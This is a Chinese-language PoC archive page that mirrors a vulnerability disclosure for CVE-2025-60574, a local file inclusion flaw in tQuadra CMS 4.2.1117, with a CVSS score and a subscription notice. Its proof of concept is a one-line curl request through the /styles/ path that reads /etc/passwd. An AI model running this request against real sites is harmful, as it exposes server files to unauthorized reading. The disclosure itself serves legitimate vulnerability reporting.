目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-60574 PoC — tQuadra CMS 安全漏洞

来源
关联漏洞
标题: tQuadra CMS 安全漏洞 (CVE-2025-60574)
Description:tQuadra CMS是意大利tQuadra CMS公司的一个内容管理系统。 tQuadra CMS 4.2.1117版本存在安全漏洞,该漏洞源于/styles路径未正确清理用户输入,可能导致本地文件包含攻击。
介绍
# Vulnerability Discoverers & Exploit Authors

Stefano Andreatta & Jacopo Candido Augelli

---

# CVE-2025-60574

## Vulnerability Description

A Local File Inclusion (LFI) vulnerability has been identified in tQuadra CMS 4.2.1117. The issue exists in the "/styles/" path, which fails to properly sanitize user-supplied input. An attacker can exploit this by sending a crafted GET request to retrieve arbitrary files from the underlying system.

Discoverers: Stefano Andreatta & Jacopo Candido Augelli

## CVSS 3.1 - 7.5 High

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
```

## Proof of Concept

```bash
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
```
![PoC.png](PoC.png)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →